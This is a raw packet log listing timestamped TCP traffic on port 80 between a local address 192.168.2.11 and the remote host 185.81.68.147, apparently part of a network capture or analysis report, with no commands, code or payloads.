                                                                                                                                                                                                Dec 13, 2024 08:18:58.185306072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185316086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185323954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185336113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185339928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185358047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185393095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186110973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186129093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186145067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186160088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186160088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186180115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186182022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186197042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186213017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186227083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186258078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186260939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186280966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186296940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186312914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186322927 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186328888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186352968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.186971903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187020063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187158108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187175035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187191010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187206030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187217951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187222958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187242031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187252045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187261105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187277079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187278032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.187331915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.196934938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.196952105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.196966887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.196984053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197000027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197016001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197022915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197031975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197047949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197063923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197078943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197088003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197096109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197108984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197112083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197135925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197151899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197873116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197889090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197904110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197920084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197933912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197941065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197952986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197964907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197969913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197988033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.197997093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198004961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198019981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198035002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198041916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198054075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198065042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198070049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198091030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198739052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198793888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198930025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198946953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198961973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198977947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198991060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.198992014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199013948 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199028969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199047089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199062109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199074030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199079990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199095964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199098110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199112892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199129105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199136972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199161053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199821949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199840069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199866056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199882030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199891090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199898958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199917078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199923992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199934959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199950933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199963093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199966908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199984074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.199990988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200001001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200017929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200031996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200033903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200061083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200764894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200781107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200809956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200815916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200828075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200844049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200850964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200860977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200876951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200886011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200892925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200908899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200917006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200926065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200942993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200951099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200958967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.200983047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201817036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201833963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201848984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201864004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201868057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201881886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201891899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201900005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201915026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201916933 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201932907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201950073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201955080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201968908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201983929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.201998949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202003956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202030897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202627897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202675104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202852964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202871084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202887058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202903032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202923059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202928066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202939987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202944994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202958107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202974081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202990055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.202991962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203006983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203022003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203028917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203041077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203054905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203056097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203072071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203735113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203766108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203778982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203782082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203799963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203814983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203821898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203833103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203845024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203850985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203869104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203886032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203891039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203902960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203917980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203933001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203933954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.203957081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204668999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204685926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204701900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204729080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204741955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204757929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204775095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204790115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204807043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204813957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.204854012 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.296753883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.296807051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.296823978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.296909094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297013044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297029018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297045946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297061920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297070980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297080994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297106028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297131062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297348022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297364950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297380924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297396898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297401905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297414064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297431946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297441959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297475100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297801018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297861099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297877073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297903061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.297998905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298015118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298031092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298048019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298074961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298557043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298573017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298588991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298626900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298713923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298731089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298747063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298757076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298764944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.298784018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299133062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299149036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299168110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299179077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299207926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299269915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299351931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299366951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299396992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299506903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299523115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299537897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299556017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299555063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299576998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299906969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299925089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299957991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.299973965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300028086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300334930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300350904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300367117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300394058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300506115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300522089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300538063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300551891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300554037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300575018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300822020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300837040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300853014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300889015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.300930023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301372051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301388025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301403999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301423073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301426888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301444054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301459074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301469088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301477909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301502943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301700115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301727057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301739931 CET4972680192.168.2.11185.81.68.147
